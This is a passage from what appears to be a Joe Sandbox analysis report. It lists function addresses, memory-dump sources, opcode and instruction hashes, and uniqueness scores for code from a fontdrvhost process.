                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6ca69c62df077648256bdad0349d78534d8e4f0c53d4938914dc7732d7f58162
                                                                    • Instruction ID: bbeb902b90c787aedfc92fb7948637b5fa9fe7e009198acb893cb47b8e52da6a
                                                                    • Opcode Fuzzy Hash: 6ca69c62df077648256bdad0349d78534d8e4f0c53d4938914dc7732d7f58162
                                                                    • Instruction Fuzzy Hash: F5B1BD31B8C64B8FE7789BA884615B877B0FF54380F2405BED45EC3183DF29A941A782
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC640F Relevance: .3, Instructions: 332COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 25e7f14f538ea338f071eebc8053bcbc8edd3e08f52822797027e81af366e931
                                                                    • Instruction ID: 6599ec4574a0cea46d9d1002d84ff8ad69a52f2a0118c86b83f65f0f994d9289
                                                                    • Opcode Fuzzy Hash: 25e7f14f538ea338f071eebc8053bcbc8edd3e08f52822797027e81af366e931
                                                                    • Instruction Fuzzy Hash: 6AC1B130A1954A8BEB29DF58C0E49B137A1FF55304B6545BED84B8B6DFCA38F942CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0E0E2F Relevance: .3, Instructions: 332COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 097c5d661ad5d2d48e542d8e09c84981fbfad7dee351bf25c821592c147db9b9
                                                                    • Instruction ID: 670fdcc397d49691e5caeae94da0ee4178af085904dd15150befed000df8fdd9
                                                                    • Opcode Fuzzy Hash: 097c5d661ad5d2d48e542d8e09c84981fbfad7dee351bf25c821592c147db9b9
                                                                    • Instruction Fuzzy Hash: 7BC1AC30A585578BEB29CF44C4E05B137B2FF45394B5446BDC85E8B68BCB38E891DB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DB68F Relevance: .3, Instructions: 331COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 07d84e5fb03a4dfc62c5286d349a20e417e1413d551e68beea9d75725357ea50
                                                                    • Instruction ID: acc96a3aa730731ae9e531852fcfd414cdcfd3b1a06b8260cb462164cd2d4edc
                                                                    • Opcode Fuzzy Hash: 07d84e5fb03a4dfc62c5286d349a20e417e1413d551e68beea9d75725357ea50
                                                                    • Instruction Fuzzy Hash: 63C1B0306186568BEB29CF58C0E05B57BB1FF45350B5446BDE85E8F6CADB38E881CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC5CA2 Relevance: .3, Instructions: 322COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: da471b5c07bfb132d3d3182b1c993609ffc9009a2fb7ae3c17548d86354476cb
                                                                    • Instruction ID: 8b3d5552bea07ff8fd2d8b7476d942628173f8c393aa25d6bc049500627dd0e9
                                                                    • Opcode Fuzzy Hash: da471b5c07bfb132d3d3182b1c993609ffc9009a2fb7ae3c17548d86354476cb
                                                                    • Instruction Fuzzy Hash: 2EC1C130A09A4A8FE759EB6CC0A26B4B7A1FF54304F55417AD44EC7AD6CB28F951CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0E071A Relevance: .3, Instructions: 308COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 12836718bf62932dc551c6b2a7925ffc3e7a439000fd2caad57608714b89b39c
                                                                    • Instruction ID: 2bff3c61880bc8cdbceebdd7dc0bfdda5943429333e43378560a0f9dc64dcc1d
                                                                    • Opcode Fuzzy Hash: 12836718bf62932dc551c6b2a7925ffc3e7a439000fd2caad57608714b89b39c
                                                                    • Instruction Fuzzy Hash: 1AB1D830B1CA478FE759DF68C4A06A4B7B1FF55384F9441B9C44EC7686DB28B861DB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC3677 Relevance: .3, Instructions: 305COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9e6bdc1c939ff894455b0eca46882a2c3aa5104d6f6ab105b5434b6d5f165cdd
                                                                    • Instruction ID: 029d472ef03f1fc8c74f3d29b4167b23382bbeaa1973d062a8fe53c9835b9472
                                                                    • Opcode Fuzzy Hash: 9e6bdc1c939ff894455b0eca46882a2c3aa5104d6f6ab105b5434b6d5f165cdd
                                                                    • Instruction Fuzzy Hash: 8521C712F0F68B86F635F7EC64774F85B507F54218F9A05BAC48E860E2CC2D2645D396
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCA187 Relevance: .3, Instructions: 299COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 362eb49a0590184f5cef7dc645826c8ff2bac8aca1adb32b9d62b4aff6fc7f1f
                                                                    • Instruction ID: b518f309ec5e2a1ad4d3c14e5441f0c9c8450b86d32ff8f37cf3f5361c98465c
                                                                    • Opcode Fuzzy Hash: 362eb49a0590184f5cef7dc645826c8ff2bac8aca1adb32b9d62b4aff6fc7f1f
                                                                    • Instruction Fuzzy Hash: 9421D712F0F29E8AF735F6ED1C752B86650BF81658F1A11B6C48E860EADC0C2945D382
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC63EF Relevance: .3, Instructions: 293COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0454307fffd7aed31d3b31b3da5c99499f8cfe7af355d662c2f247008ad303b3
                                                                    • Instruction ID: eaaa1d0e56047af360477a3f34ecf21f76a826c6de59b02bc7d16d3eac21e6fb
                                                                    • Opcode Fuzzy Hash: 0454307fffd7aed31d3b31b3da5c99499f8cfe7af355d662c2f247008ad303b3
                                                                    • Instruction Fuzzy Hash: 36B1AF706196098FEB59DF58C0E09B137A1FF59314B6145BDC84B8B69FCB38E982CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DE0D4 Relevance: .3, Instructions: 274COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 50207f5f71107bd09b4a3405214d4c90116fd511392a923c0a83704331b7cd3e
                                                                    • Instruction ID: f7fced70a37e16109d7173f00620f78cfcf5ba2eafc27968260f3835afde20f3
                                                                    • Opcode Fuzzy Hash: 50207f5f71107bd09b4a3405214d4c90116fd511392a923c0a83704331b7cd3e
                                                                    • Instruction Fuzzy Hash: 2211A352F0D39786F6395AE424350BC5D70AF517D1F5A03BBF9AE821C2EE4C68447286
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DFBF6 Relevance: .3, Instructions: 262COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 28db82e2b96f4c8e433d69ea0a39e007c1eca71e3ca5c5e7541b11108be757d1
                                                                    • Instruction ID: c7da86f29bc7d7164a91ed3650ec5daeafa2ac05985e68c560dd1c3f233e5b2f
                                                                    • Opcode Fuzzy Hash: 28db82e2b96f4c8e433d69ea0a39e007c1eca71e3ca5c5e7541b11108be757d1
                                                                    • Instruction Fuzzy Hash: A981F231B0C7474FE7789BA8A46117577F1EF85394F14867EE88EC3282EF29A8429741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DA466 Relevance: .3, Instructions: 252COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d154c4975bc8c89ec0f92b514816a522fa0ec6f45f53f88fc60bbb5bf531f247
                                                                    • Instruction ID: 56ee3df9f791b037a449528cf5b8aa0e0f1877e33b494be0eefe55dc0a006193
                                                                    • Opcode Fuzzy Hash: d154c4975bc8c89ec0f92b514816a522fa0ec6f45f53f88fc60bbb5bf531f247
                                                                    • Instruction Fuzzy Hash: BE81EE31A1CB438BE7389A6894251B577F8FF85354F14067EF48E83186EF28AA029741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC3329 Relevance: .2, Instructions: 250COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c9d34a83a9023071e781d12b0ed2a284f0ddde47400daf59f20560091ca91f94
                                                                    • Instruction ID: cd7f3f0d6af46205cc10de101669ad8d472d2b2f1d99c616e7fd9654cc81b95b
                                                                    • Opcode Fuzzy Hash: c9d34a83a9023071e781d12b0ed2a284f0ddde47400daf59f20560091ca91f94
                                                                    • Instruction Fuzzy Hash: 25710431A0E84D4FE779FA5C88675B437D0FF84318B5602B9D09EC75F2DE28AA06C681
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D8389 Relevance: .2, Instructions: 249COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bbe5002938b968e8b554f7f792f70c1d31cee9f1a4b7f398af9dd328f0e07414
                                                                    • Instruction ID: fa308d2d1a73900f027d5ccf21d55b42924831c959bf519b2e7e260836987fec
                                                                    • Opcode Fuzzy Hash: bbe5002938b968e8b554f7f792f70c1d31cee9f1a4b7f398af9dd328f0e07414
                                                                    • Instruction Fuzzy Hash: DD71E231A0C64B4FE778DA5898275B937E0FF84352F1403B9F19EC75A2EF18A81696C1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC51E6 Relevance: .2, Instructions: 248COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2ee0636d2c6a0225f3db57045d01faa9cac5b80326e2eee921edd463b3456aad
                                                                    • Instruction ID: 6d72101992a8e141ea22b0621766d412924d1cba8c3453adfc373570441d9cac
                                                                    • Opcode Fuzzy Hash: 2ee0636d2c6a0225f3db57045d01faa9cac5b80326e2eee921edd463b3456aad
                                                                    • Instruction Fuzzy Hash: 26711631B0EA498FE338EBAC946257577E0FF85318B16057ED48FC61E2DE29A502C751
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC9E39 Relevance: .2, Instructions: 247COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8c25c3614097009b90afccddadc177844943fd7aa70b410ac5d00d7a7ac0dde2
                                                                    • Instruction ID: 0b8c784a67d00081f7c27e707b8c16dba41f594f45648dc4f4f79e608a9e640b
                                                                    • Opcode Fuzzy Hash: 8c25c3614097009b90afccddadc177844943fd7aa70b410ac5d00d7a7ac0dde2
                                                                    • Instruction Fuzzy Hash: 0071E731A0E54E4FF779EA9C842A5B537C0FF56314B0602B9D4DEC75F1DE28AA0AC681
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DE0A7 Relevance: .2, Instructions: 246COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f90ecc17375473043cc7d72fef0a83efc894f9b8fcf590bd7f93a7de0453e733
                                                                    • Instruction ID: 128b8e9d9bfca0f91edc125ee23d79e8bac84bc618d737dd629d626ba037c4ef
                                                                    • Opcode Fuzzy Hash: f90ecc17375473043cc7d72fef0a83efc894f9b8fcf590bd7f93a7de0453e733
                                                                    • Instruction Fuzzy Hash: 6E11A252F0C36785F63966D424354F91A605F013E0F1A03BAF86E861C2EE0928447286
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC3EEB Relevance: .2, Instructions: 240COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 65f2e6364e51fa5a397143a6dde627c862d48b6cb81ef0e12ac321a92335715d
                                                                    • Instruction ID: 8ff3887d4b8e721230ec526ff292f4eca60600a80671774ec4904c4a4f43a802
                                                                    • Opcode Fuzzy Hash: 65f2e6364e51fa5a397143a6dde627c862d48b6cb81ef0e12ac321a92335715d
                                                                    • Instruction Fuzzy Hash: 4481AF30E1D54E8EEBA5EBA888656BCBBB1FF45308F5105BAD00ED71E5DE386A41C701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCDF21 Relevance: .2, Instructions: 232COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6781f9fd8e6936316a7b3921810f366308bad1213dce08d2cc68fcf7b7e2169
                                                                    • Instruction ID: e073eb7a6786b1643baac5d9614c0d5da2e10fc243b1b22017f9b2dffd9ffa9b
                                                                    • Opcode Fuzzy Hash: e6781f9fd8e6936316a7b3921810f366308bad1213dce08d2cc68fcf7b7e2169
                                                                    • Instruction Fuzzy Hash: F5918E30A0AB0A8FE374EB58C1A557177E1FF54308B51557EC48AC7AE6CB39B942CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D8DA0 Relevance: .2, Instructions: 225COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 55a489e0308a47dfbc2db00d9bbe4972c4cc6ea14799e558ba0c002d063f6ef2
                                                                    • Instruction ID: 71c81f9da010d987d976207b519b16a73e031685bdb497f92fbbcb0bd11d32ed
                                                                    • Opcode Fuzzy Hash: 55a489e0308a47dfbc2db00d9bbe4972c4cc6ea14799e558ba0c002d063f6ef2
                                                                    • Instruction Fuzzy Hash: 3F612961F0D65B4FEB61A7A898A25F87BB1EF55380F0403B6E04DC71C6EF18684297C1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D769B Relevance: .2, Instructions: 223COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 78e6867fae9098022924ee614dde854cf1cb19a1bc78244abef5b06660f60a82
                                                                    • Instruction ID: dca365799def73edd9e8d3eaef7de1a48639b65b7391212d142043612100b9a3
                                                                    • Opcode Fuzzy Hash: 78e6867fae9098022924ee614dde854cf1cb19a1bc78244abef5b06660f60a82
                                                                    • Instruction Fuzzy Hash: 04719130E1C64B8EEB65DBA888755BD7BB1EF55380F5006BAE00ED71C9EF286941D701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCA9FB Relevance: .2, Instructions: 222COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eb541074d04c6bdb0452c6845d1cdea42f2c1d9f3512534ac72e8b1cfd6b4afe
                                                                    • Instruction ID: bd3645468e136ffb2d02b4c28587dbd98328ff97a699460c97e831987caaa1dc
                                                                    • Opcode Fuzzy Hash: eb541074d04c6bdb0452c6845d1cdea42f2c1d9f3512534ac72e8b1cfd6b4afe
                                                                    • Instruction Fuzzy Hash: 7971C930E1E54E8EEB75EBA884656BD7BB1FF45308F1104BAD01ED71EADE286A41C701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DD985 Relevance: .2, Instructions: 215COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bb125272ce2914f6b33485969103a1aa8b46f2649caaacbc7ca88d3935ed0725
                                                                    • Instruction ID: cd9b29f987c2171322c7c118525342fc828c16a406e4067d7c27d819524c510c
                                                                    • Opcode Fuzzy Hash: bb125272ce2914f6b33485969103a1aa8b46f2649caaacbc7ca88d3935ed0725
                                                                    • Instruction Fuzzy Hash: 5761D522F0D75B4FEB61EBACA4A15E97BB0EF053A4F0402B6E05EC6183EA195805D394
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DB07E Relevance: .2, Instructions: 204COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f805f77e8d05ab2dd8148601605bcae7ee157b13e354ae6901e4bdce62ff7e9b
                                                                    • Instruction ID: e365d1c372600bbf8f80d0de1b7be188570853d619a23165ba9ee6798bffa3ed
                                                                    • Opcode Fuzzy Hash: f805f77e8d05ab2dd8148601605bcae7ee157b13e354ae6901e4bdce62ff7e9b
                                                                    • Instruction Fuzzy Hash: 5A71D330A0CB878FD759DB68D0A05B4BBB0FF15350F5446B9E44ECBAC6EB28A851C780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC2EFA Relevance: .2, Instructions: 198COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7b9285b1b621db4ef6f01cf74fa3834e34a1e137d95fecafa61a398c9c4ad63c
                                                                    • Instruction ID: 3c438f9ed9ae6d6490c1077a4638094c2c955404e3bd58cf952c62a0e64b9b05
                                                                    • Opcode Fuzzy Hash: 7b9285b1b621db4ef6f01cf74fa3834e34a1e137d95fecafa61a398c9c4ad63c
                                                                    • Instruction Fuzzy Hash: EF51FA72A0E59D4FE755EBACD8B19F837B0FF11318B090176C459C61D3E925654AC740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DE91B Relevance: .2, Instructions: 187COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 16fd8fb3d8567490a1f864a5231011a8833741963ae0879da5d4f68e587e1905
                                                                    • Instruction ID: dc850950e6ee955a984def09d45c5cb37d1b913682d6e8d4b24674b93854cebd
                                                                    • Opcode Fuzzy Hash: 16fd8fb3d8567490a1f864a5231011a8833741963ae0879da5d4f68e587e1905
                                                                    • Instruction Fuzzy Hash: 0451DF30E19A4B8EEBA4DBA8C8645FDBFB1FF45380F1102BAE01ED7185EB3568419741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCD270 Relevance: .2, Instructions: 181COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 21286edb8379b1a2401e5af363b0adf2d797370218e4a73d17b45048f7cd28a3
                                                                    • Instruction ID: 11261cbb07c32ff84ac4936a08435e7b3be80e2c1103eb6a25b08209d2e3292f
                                                                    • Opcode Fuzzy Hash: 21286edb8379b1a2401e5af363b0adf2d797370218e4a73d17b45048f7cd28a3
                                                                    • Instruction Fuzzy Hash: C251E020F0995E4EEBB8EB5C88B56F876A1FF90305F4541FAC04EC71D6DD28AA81CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DBA00 Relevance: .2, Instructions: 176COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3a13f550e52dc624645a655dcbff42a34eef4d262694b59b2806205e71bb1bc1
                                                                    • Instruction ID: e22b4ba26628edba7f5dda3ab105b2c2acd93e77b80552ef5af4bdeb953792c5
                                                                    • Opcode Fuzzy Hash: 3a13f550e52dc624645a655dcbff42a34eef4d262694b59b2806205e71bb1bc1
                                                                    • Instruction Fuzzy Hash: FA51C420F1865B4EEBB89B588475AB877B1EF54301F4442FAE05EDB1CAEE2869409B41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D9DA5 Relevance: .2, Instructions: 163COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
